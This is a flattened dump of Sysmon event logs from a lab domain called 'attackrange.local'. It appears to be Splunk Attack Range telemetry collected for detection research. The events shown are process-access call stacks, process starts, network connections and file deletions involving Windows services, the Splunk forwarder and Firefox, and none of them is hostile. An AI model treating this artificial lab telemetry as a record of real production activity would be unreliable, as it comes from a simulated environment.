08:02:31.899{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083537Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:31.899{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083536Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:31.899{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083535Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:31.899{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083534Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:31.899{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083533Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:31.899{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B517-615A-9701-00000000FD01}1760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083532Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:31.899{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B517-615A-9701-00000000FD01}1760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083531Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:31.900{2FDD8D40-B517-615A-9701-00000000FD01}1760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000083530Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:29.423{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50177-false10.0.1.12-8089- 23542300x800000000000000083529Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:31.446{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E77A9CA13EFD1AEAC8C607A16D936D33,SHA256=EC62BE417E401D924C80D1B61B24133E63C99905A81C1A4F8FADCA2D6FD3C996,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107676Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:29.049{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-639.attackrange.local53domainfalse10.0.1.14win-dc-639.attackrange.local61351- 23542300x8000000000000000107675Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:31.254{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B44E37BA83AF3CB47BA0B5D817F51BE8,SHA256=99CCD0FF78B4908835DB29A2BC6905CD048405A2CC00784442036089FACEC812,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083528Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:31.399{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B517-615A-9601-00000000FD01}832C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083527Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:31.399{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083526Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:31.399{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083525Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:31.399{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083524Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:31.399{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083523Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:31.399{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083522Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:31.399{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083521Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:31.399{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083520Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:31.399{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083519Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:31.399{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083518Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:31.399{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B517-615A-9601-00000000FD01}832C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083517Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:31.399{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B517-615A-9601-00000000FD01}832C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083516Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:31.400{2FDD8D40-B517-615A-9601-00000000FD01}832C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000107681Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:32.553{58E9C193-AE68-615A-C800-00000000FC01}45484124C:\Windows\Explorer.EXE{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+55a10|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF8039A66F8A8)|UNKNOWN(FFFFA5175A805B48)|UNKNOWN(FFFFA5175A805CC7)|UNKNOWN(FFFFA5175A800351)|UNKNOWN(FFFFA5175A801D1A)|UNKNOWN(FFFFA5175A7FFFD6)|UNKNOWN(FFFFF8039A387103)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5927b|C:\Windows\System32\SHELL32.dll+dac2a|C:\Windows\System32\SHCORE.dll+33fad 10341000x8000000000000000107680Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:32.553{58E9C193-AE68-615A-C800-00000000FC01}45484124C:\Windows\Explorer.EXE{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+554f1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF8039A66F8A8)|UNKNOWN(FFFFA5175A805B48)|UNKNOWN(FFFFA5175A805CC7)|UNKNOWN(FFFFA5175A800351)|UNKNOWN(FFFFA5175A801D1A)|UNKNOWN(FFFFA5175A7FFFD6)|UNKNOWN(FFFFF8039A387103)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5927b|C:\Windows\System32\SHELL32.dll+dac2a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000107679Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:32.553{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RF21ca73.TMPMD5=322CF601A190AAE2280EDEC06D61547D,SHA256=BF27E9C1B001E1DB8B22F84AC2A23F0226686111BA72DFB4AFE94B2802EE9E56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107678Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:32.269{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3658A05FE3BCDB0377365D58177B01DB,SHA256=7F4056080E9C39C68B6A01E96D7EF1B86EF492EF57072A29485AAE6C50982E66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083547Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:32.446{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT 